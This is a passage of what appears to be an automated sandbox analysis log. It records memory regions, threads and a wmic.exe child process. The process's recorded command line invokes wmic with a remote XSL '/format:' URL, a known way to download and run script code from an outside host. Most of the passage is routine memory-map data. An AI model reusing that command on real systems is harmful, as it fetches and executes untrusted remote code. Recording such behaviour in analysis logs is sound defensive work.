	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 570
	        start_va = 0x90fa840000
	          end_va = 0x90fa87ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000090fa840000"
	        filename = ""

Region:
	              id = 571
	        start_va = 0x1b69fe20000
	          end_va = 0x1b69fe21fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b69fe20000"
	        filename = ""

Region:
	              id = 572
	        start_va = 0x1b69fe30000
	          end_va = 0x1b69fe30fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b69fe30000"
	        filename = ""

Region:
	              id = 573
	        start_va = 0x1b69fe60000
	          end_va = 0x1b69ff73fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b69fe60000"
	        filename = ""

Region:
	              id = 574
	        start_va = 0x1b69ff80000
	          end_va = 0x1b69ff8ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b69ff80000"
	        filename = ""

Region:
	              id = 575
	        start_va = 0x1b69ff90000
	          end_va = 0x1b6a02c6fff
	     entry_point = 0x1b69ff90000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 576
	        start_va = 0x1b6a02d0000
	          end_va = 0x1b6a04e7fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b6a02d0000"
	        filename = ""

Region:
	              id = 577
	        start_va = 0x1b6a04f0000
	          end_va = 0x1b6a0705fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b6a04f0000"
	        filename = ""

Region:
	              id = 578
	        start_va = 0x1b6a0710000
	          end_va = 0x1b6a0926fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b6a0710000"
	        filename = ""

Region:
	              id = 579
	        start_va = 0x1b6a0930000
	          end_va = 0x1b6a0a38fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b6a0930000"
	        filename = ""

Region:
	              id = 580
	        start_va = 0x7ffc16810000
	          end_va = 0x7ffc16969fff
	     entry_point = 0x7ffc16810000
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 581
	        start_va = 0x1b69fdc0000
	          end_va = 0x1b69fdc3fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b69fdc0000"
	        filename = ""

Region:
	              id = 582
	        start_va = 0x1b6a0a40000
	          end_va = 0x1b6a0afbfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b6a0a40000"
	        filename = ""

Region:
	              id = 583
	        start_va = 0x7ffc119f0000
	          end_va = 0x7ffc11a11fff
	     entry_point = 0x7ffc119f0000
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 584
	        start_va = 0x7ffc120e0000
	          end_va = 0x7ffc120f2fff
	     entry_point = 0x7ffc120e0000
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 585
	        start_va = 0x7ffc13830000
	          end_va = 0x7ffc13885fff
	     entry_point = 0x7ffc13830000
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 586
	        start_va = 0x1b69fdd0000
	          end_va = 0x1b69fdd6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b69fdd0000"
	        filename = ""

Region:
	              id = 587
	        start_va = 0x1b69fde0000
	          end_va = 0x1b69fde0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b69fde0000"
	        filename = ""

Region:
	              id = 588
	        start_va = 0x1b69fdf0000
	          end_va = 0x1b69fdf0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b69fdf0000"
	        filename = ""

Region:
	              id = 589
	        start_va = 0x1b69fe00000
	          end_va = 0x1b69fe00fff
	     entry_point = 0x1b69fe00000
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 590
	        start_va = 0x1b69fe10000
	          end_va = 0x1b69fe14fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b69fe10000"
	        filename = ""

Region:
	              id = 591
	        start_va = 0x1b69fe40000
	          end_va = 0x1b69fe41fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b69fe40000"
	        filename = ""

Region:
	              id = 592
	        start_va = 0x1b6a0b00000
	          end_va = 0x1b6a0b8bfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b6a0b00000"
	        filename = ""

Region:
	              id = 593
	        start_va = 0x7ffc097b0000
	          end_va = 0x7ffc09a23fff
	     entry_point = 0x7ffc097b0000
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")


Thread:
	id = 34
	os_tid = 0xde0


Thread:
	id = 35
	os_tid = 0xdbc


Thread:
	id = 36
	os_tid = 0xda4


Thread:
	id = 37
	os_tid = 0xe28


Process:
	id = "4"
	image_name = "wmic.exe"
	filename = "c:\\windows\\system32\\wbem\\wmic.exe"
	page_root = "0x1d1b5000"
	os_pid = "0xd94"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "2"
	os_parent_pid = "0xccc"
	cmd_line = "wmic  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" "
	cur_dir = "C:\\Users\\Nd9E1FYi\\Desktop\\"
	os_username = "X2VS1CUM\\Nd9E1FYi"
	os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb37" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 603
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 604
	        start_va = 0x3500000000
	          end_va = 0x35001fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000003500000000"
	        filename = ""

Region:
	              id = 605
	        start_va = 0x3500200000
	          end_va = 0x350027ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000003500200000"
	        filename = ""

Region:
	              id = 606
	        start_va = 0x233e1000000
	          end_va = 0x233e101ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1000000"
	        filename = ""

Region:
	              id = 607
	        start_va = 0x233e1020000
	          end_va = 0x233e1034fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e1020000"
	        filename = ""

Region:
	              id = 608
	        start_va = 0x233e1040000
	          end_va = 0x233e1043fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e1040000"
	        filename = ""

Region:
	              id = 609
	        start_va = 0x233e1050000
	          end_va = 0x233e1050fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e1050000"
	        filename = ""

Region:
	              id = 610
	        start_va = 0x233e1060000
	          end_va = 0x233e1061fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1060000"
	        filename = ""

Region:
	              id = 611
	        start_va = 0x7df5ff900000
	          end_va = 0x7ff5ff8fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff900000"
	        filename = ""

Region:
	              id = 612
	        start_va = 0x7ff66df40000
	          end_va = 0x7ff66df62fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff66df40000"
	        filename = ""

Region:
	              id = 613
	        start_va = 0x7ff66e670000
	          end_va = 0x7ff66e6f1fff
	     entry_point = 0x7ff66e670000
	     region_type = mapped_file
	            name = "wmic.exe"
	        filename = "\\Windows\\System32\\wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")

Region:
	              id = 614
	        start_va = 0x7ffc17400000
	          end_va = 0x7ffc175c0fff
	     entry_point = 0x7ffc17400000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 615
	        start_va = 0x233e1210000
	          end_va = 0x233e130ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1210000"
	        filename = ""

Region:
	              id = 616
	        start_va = 0x7ffc14550000
	          end_va = 0x7ffc14737fff
	     entry_point = 0x7ffc14550000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 617
	        start_va = 0x7ffc17120000
	          end_va = 0x7ffc171ccfff
	     entry_point = 0x7ffc17120000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 618
	        start_va = 0x3500280000
	          end_va = 0x35002fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000003500280000"
	        filename = ""

Region:
	              id = 619
	        start_va = 0x233e1000000
	          end_va = 0x233e100ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e1000000"
	        filename = ""

Region:
	              id = 620
	        start_va = 0x233e1010000
	          end_va = 0x233e1016fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1010000"
	        filename = ""

Region:
	              id = 621
	        start_va = 0x233e1070000
	          end_va = 0x233e112dfff
	     entry_point = 0x233e1070000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 622
	        start_va = 0x233e14f0000
	          end_va = 0x233e14fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e14f0000"
	        filename = ""

Region:
	              id = 623
	        start_va = 0x7ff66de40000
	          end_va = 0x7ff66df3ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff66de40000"
	        filename = ""

Region:
	              id = 624
	        start_va = 0x7ffbfe150000
	          end_va = 0x7ffbfe19dfff
	     entry_point = 0x7ffbfe150000
	     region_type = mapped_file
	            name = "framedynos.dll"
	        filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")

Region:
	              id = 625
	        start_va = 0x7ffc0c8d0000
	          end_va = 0x7ffc0c907fff
	     entry_point = 0x7ffc0c8d0000
	     region_type = mapped_file
	            name = "iphlpapi.dll"
	        filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")

Region:
	              id = 626
	        start_va = 0x7ffc136a0000
	          end_va = 0x7ffc136ccfff
	     entry_point = 0x7ffc136a0000
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")

Region:
	              id = 627
	        start_va = 0x7ffc144e0000
	          end_va = 0x7ffc14549fff
	     entry_point = 0x7ffc144e0000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 628
	        start_va = 0x7ffc14950000
	          end_va = 0x7ffc14a6bfff
	     entry_point = 0x7ffc14950000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 629
	        start_va = 0x7ffc15fd0000
	          end_va = 0x7ffc1624cfff
	     entry_point = 0x7ffc15fd0000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 630
	        start_va = 0x7ffc164b0000
	          end_va = 0x7ffc1654cfff
	     entry_point = 0x7ffc164b0000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 631
	        start_va = 0x7ffc16660000
	          end_va = 0x7ffc166bafff
	     entry_point = 0x7ffc16660000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 632
	        start_va = 0x233e1130000
	          end_va = 0x233e1136fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1130000"
	        filename = ""

Region:
	              id = 633
	        start_va = 0x233e1310000
	          end_va = 0x233e13ecfff
	     entry_point = 0x233e1310000
	     region_type = mapped_file
	            name = "rpcss.dll"
	        filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")

Region:
	              id = 634
	        start_va = 0x7ffc13aa0000
	          end_va = 0x7ffc13aaefff
	     entry_point = 0x7ffc13aa0000
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 635
	        start_va = 0x233e1140000
	          end_va = 0x233e1140fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e1140000"
	        filename = ""

Region:
	              id = 636
	        start_va = 0x7ffc16550000
	          end_va = 0x7ffc165f6fff
	     entry_point = 0x7ffc16550000
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")

Region:
	              id = 637
	        start_va = 0x233e1150000
	          end_va = 0x233e1150fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e1150000"
	        filename = ""

Region:
	              id = 638
	        start_va = 0x7ffc06b80000
	          end_va = 0x7ffc06b90fff
	     entry_point = 0x7ffc06b80000
	     region_type = mapped_file
	            name = "wbemprox.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")

Region:
	              id = 639
	        start_va = 0x7ffc16970000
	          end_va = 0x7ffc169dafff
	     entry_point = 0x7ffc16970000
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")

Region:
	              id = 640
	        start_va = 0x7ffc07e60000
	          end_va = 0x7ffc07edefff
	     entry_point = 0x7ffc07e60000
	     region_type = mapped_file
	            name = "wbemcomn.dll"
	        filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")

Region:
	              id = 641
	        start_va = 0x7ffc13950000
	          end_va = 0x7ffc13978fff
	     entry_point = 0x7ffc13950000
	     region_type = mapped_file
	            name = "bcrypt.dll"
	        filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")

Region:
	              id = 642
	        start_va = 0x233e1500000
	          end_va = 0x233e1836fff
	     entry_point = 0x233e1500000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 643
	        start_va = 0x7ffc16fb0000
	          end_va = 0x7ffc17070fff
	     entry_point = 0x7ffc16fb0000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 644
	        start_va = 0x233e1310000
	          end_va = 0x233e1452fff
	     entry_point = 0x233e1310000
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 645
	        start_va = 0x7ffbfc900000
	          end_va = 0x7ffbfcb3efff
	     entry_point = 0x7ffbfc900000
	     region_type = mapped_file
	            name = "msxml3.dll"
	        filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll")

Region:
	              id = 646
	        start_va = 0x233e1840000
	          end_va = 0x233e1a2ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1840000"
	        filename = ""

Region:
	              id = 647
	        start_va = 0x233e1310000
	          end_va = 0x233e14dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1310000"
	        filename = ""

Region:
	              id = 648
	        start_va = 0x233e1310000
	          end_va = 0x233e144ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1310000"
	        filename = ""

Region:
	              id = 649
	        start_va = 0x233e14d0000
	          end_va = 0x233e14dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e14d0000"
	        filename = ""

Region:
	              id = 650
	        start_va = 0x233e1160000
	          end_va = 0x233e11dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1160000"
	        filename = ""

Region:
	              id = 651
	        start_va = 0x233e1310000
	          end_va = 0x233e138ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1310000"
	        filename = ""

Region:
	              id = 652
	        start_va = 0x233e1440000
	          end_va = 0x233e144ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1440000"
	        filename = ""

Region:
	              id = 653
	        start_va = 0x233e1160000
	          end_va = 0x233e11bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1160000"
	        filename = ""

Region:
	              id = 654
	        start_va = 0x233e11d0000
	          end_va = 0x233e11dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e11d0000"
	        filename = ""

Region:
	              id = 655
	        start_va = 0x233e1840000
	          end_va = 0x233e195ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1840000"
	        filename = ""

Region:
	              id = 656
	        start_va = 0x233e1a20000
	          end_va = 0x233e1a2ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1a20000"
	        filename = ""

Region:
	              id = 657
	        start_va = 0x233e1160000
	          end_va = 0x233e1161fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e1160000"
	        filename = ""

Region:
	              id = 658
	        start_va = 0x233e1170000
	          end_va = 0x233e1170fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e1170000"
	        filename = ""

Region:
	              id = 659
	        start_va = 0x233e11b0000
	          end_va = 0x233e11bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e11b0000"
	        filename = ""

Region:
	              id = 660
	        start_va = 0x233e1840000
	          end_va = 0x233e191ffff
	     entry_point = 0x233e1840000
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")

Region:
	              id = 661
	        start_va = 0x233e1950000
	          end_va = 0x233e195ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1950000"
	        filename = ""

Region:
	              id = 662
	        start_va = 0x233e1a30000
	          end_va = 0x233e1e2ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1a30000"
	        filename = ""

Region:
	              id = 663
	        start_va = 0x233e1180000
	          end_va = 0x233e1180fff
	     entry_point = 0x233e1180000
	     region_type = mapped_file
	            name = "msxml3r.dll"
	        filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll")

Region:
	              id = 664
	        start_va = 0x233e1190000
	          end_va = 0x233e11affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1190000"
	        filename = ""

Region:
	              id = 665
	        start_va = 0x7ffc079e0000
	          end_va = 0x7ffc07b97fff
	     entry_point = 0x7ffc079e0000
	     region_type = mapped_file
	            name = "urlmon.dll"
	        filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")

Region:
	              id = 666
	        start_va = 0x7ffc16250000
	          end_va = 0x7ffc162f6fff
	     entry_point = 0x7ffc16250000
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 667
	        start_va = 0x7ffc14740000
	          end_va = 0x7ffc147f4fff
	     entry_point = 0x7ffc14740000
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 668
	        start_va = 0x7ffc173a0000
	          end_va = 0x7ffc173f1fff
	     entry_point = 0x7ffc173a0000
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 669
	        start_va = 0x7ffc169e0000
	          end_va = 0x7ffc16b65fff
	     entry_point = 0x7ffc169e0000
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 670
	        start_va = 0x7ffc171d0000
	          end_va = 0x7ffc17325fff
	     entry_point = 0x7ffc171d0000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 671
	        start_va = 0x7ffc0d740000
	          end_va = 0x7ffc0dac1fff
	     entry_point = 0x7ffc0d740000
	     region_type = mapped_file
	            name = "iertutil.dll"
	        filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")

Region:
	              id = 672
	        start_va = 0x7ffc13c50000
	          end_va = 0x7ffc14293fff
	     entry_point = 0x7ffc13c50000
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 673
	        start_va = 0x7ffc14490000
	          end_va = 0x7ffc144d2fff
	     entry_point = 0x7ffc14490000
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 674
	        start_va = 0x7ffc13a40000
	          end_va = 0x7ffc13a8afff
	     entry_point = 0x7ffc13a40000
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 675
	        start_va = 0x7ffc13a20000
	          end_va = 0x7ffc13a33fff
	     entry_point = 0x7ffc13a20000
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 676
	        start_va = 0x233e1310000
	          end_va = 0x233e1348fff
	     entry_point = 0x233e1310000
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 677
	        start_va = 0x233e1380000
	          end_va = 0x233e138ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e1380000"
	        filename = ""

Region:
	              id = 678
	        start_va = 0x233e1e30000
	          end_va = 0x233e1fb7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e1e30000"
	        filename = ""

Region:
	              id = 679
	        start_va = 0x7ffc167d0000
	          end_va = 0x7ffc1680afff
	     entry_point = 0x7ffc167d0000
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 680
	        start_va = 0x233e11c0000
	          end_va = 0x233e11cffff
	     entry_point = 0x233e11c0000
	     region_type = mapped_file
	            name = "wmic.exe.mui"
	        filename = "\\Windows\\System32\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\wmic.exe.mui")

Region:
	              id = 681
	        start_va = 0x233e1fc0000
	          end_va = 0x233e2140fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e1fc0000"
	        filename = ""

Region:
	              id = 682
	        start_va = 0x233e2150000
	          end_va = 0x233e354ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e2150000"
	        filename = ""

Region:
	              id = 683
	        start_va = 0x233e11e0000
	          end_va = 0x233e11e0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e11e0000"
	        filename = ""

Region:
	              id = 684
	        start_va = 0x233e11f0000
	          end_va = 0x233e11f0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e11f0000"
	        filename = ""

Region:
	              id = 685
	        start_va = 0x7ffc06700000
	          end_va = 0x7ffc0698dfff
	     entry_point = 0x7ffc06700000
	     region_type = mapped_file
	            name = "wininet.dll"
	        filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")

Region:
	              id = 686
	        start_va = 0x7ffc14800000
	          end_va = 0x7ffc14942fff
	     entry_point = 0x7ffc14800000
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 687
	        start_va = 0x7ffc123a0000
	          end_va = 0x7ffc12435fff
	     entry_point = 0x7ffc123a0000
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 688
	        start_va = 0x233e3550000
	          end_va = 0x233e370ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e3550000"
	        filename = ""

Region:
	              id = 689
	        start_va = 0x7ffc16810000
	          end_va = 0x7ffc16969fff
	     entry_point = 0x7ffc16810000
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 690
	        start_va = 0x233e1200000
	          end_va = 0x233e1200fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e1200000"
	        filename = ""

Region:
	              id = 691
	        start_va = 0x233e1960000
	          end_va = 0x233e1a1bfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e1960000"
	        filename = ""

Region:
	              id = 692
	        start_va = 0x233e1200000
	          end_va = 0x233e1203fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e1200000"
	        filename = ""

Region:
	              id = 693
	        start_va = 0x7ffc119f0000
	          end_va = 0x7ffc11a11fff
	     entry_point = 0x7ffc119f0000
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 694
	        start_va = 0x233e3550000
	          end_va = 0x233e362cfff
	     entry_point = 0x233e3550000
	     region_type = mapped_file
	            name = "rpcss.dll"
	        filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")

Region:
	              id = 695
	        start_va = 0x233e3700000
	          end_va = 0x233e370ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e3700000"
	        filename = ""

Region:
	              id = 696
	        start_va = 0x3500300000
	          end_va = 0x350037ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000003500300000"
	        filename = ""

Region:
	              id = 697
	        start_va = 0x3500380000
	          end_va = 0x35003fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000003500380000"
	        filename = ""

Region:
	              id = 698
	        start_va = 0x3500400000
	          end_va = 0x350047ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000003500400000"
	        filename = ""

Region:
	              id = 699
	        start_va = 0x3500480000
	          end_va = 0x35004fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000003500480000"
	        filename = ""

Region:
	              id = 700
	        start_va = 0x7ffbf77c0000
	          end_va = 0x7ffbf77d2fff
	     entry_point = 0x7ffbf77c0000
	     region_type = mapped_file
	            name = "msoxmlmf.dll"
